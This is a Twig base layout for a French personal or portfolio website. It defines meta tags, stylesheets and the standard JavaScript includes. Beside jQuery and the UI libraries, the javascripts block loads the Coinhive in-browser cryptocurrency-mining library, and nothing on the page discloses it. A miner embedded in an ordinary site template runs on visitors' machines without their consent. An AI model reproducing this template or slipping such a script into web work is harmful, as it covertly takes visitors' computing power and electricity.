{% set curr_route = app.request.attributes.get('_route') %}

<!DOCTYPE html>
<html lang="fr-FR">
<head>
    <meta charset="{% block metaCharset %}utf-8{% endblock %}">
    <meta name="viewport" content="{% block metaViewport %}width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no{% endblock %}">

    <title>{% block title %} | {{ getContent().name|raw_desc }} - {{ getContent().job_title|raw_desc }}{% endblock %}</title>
    <meta name="description" content="{% block metaDescription %}{{ getContent().meta_description|raw_desc }}{% endblock %}" />
    <meta name="keywords" content="{% block metaKeywords %}{{ getContent().keywords|raw_desc }}{% endblock %}">
    <meta name="geo.placename" content="{% block metaGeoPlacename %}{{ getContent().city_complete|raw_desc }}{% endblock %}">
    <meta name="robots" content="{% block metaRobots %}index,follow{% endblock %}">

    <meta name="author" content="{% block metaAuthor %}{{ getContent().name|raw_desc }}{% endblock %}" />
    <meta name="copyright" content="{% block metaCopyright %}{{ getContent().name|raw_desc }}{% endblock %}" />

    {% block favicon %}
        <link rel="icon" type="image/x-icon" href="{{ asset('favicon.ico') }}" />
    {% endblock %}

    <!--[if lt IE 9]>
    <script src="{{ asset('bower_components/html5shiv/dist/html5shiv.js') }}"></script>
    <![endif]-->

    {% block twitterCard %}
        {% include 'partials/meta/twitter.html.twig' %}
    {% endblock %}

    {% block metaOg %}
        {% include 'partials/meta/facebook.html.twig' %}
    {% endblock %}

    {% block fonts %}
        <link href="https://fonts.googleapis.com/css?family=Raleway:300,500,700" rel="stylesheet">
    {% endblock %}

    {% block stylesheets %}
        {% stylesheets'css/reset.css' 'css/main.css' 'bower_components/izitoast/dist/css/iziToast.min.css' 'bower_components/font-awesome/css/font-awesome.min.css' filter='cssrewrite' %}
            <link rel="stylesheet" href="{{ asset_url }}" />
        {% endstylesheets %}
    {% endblock %}
</head>

<body>
{% block body %}
    {% block header %}
        {% include 'partials/header.html.twig' %}
    {% endblock %}

    {% block content %}{% endblock %}
{% endblock %}

{% block javascripts %}
    <script src="{{ asset('bower_components/jquery/dist/jquery.min.js') }}"></script>
    <script src="{{ asset('bower_components/izitoast/dist/js/iziToast.min.js') }}" type="text/javascript"></script>
    <script src="{{ asset('bower_components/js-cookie/src/js.cookie.js') }}" type="text/javascript"></script>
    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
{% endblock %}

{% include 'partials/meta/javascript.html.twig' %}
</body>
</html>
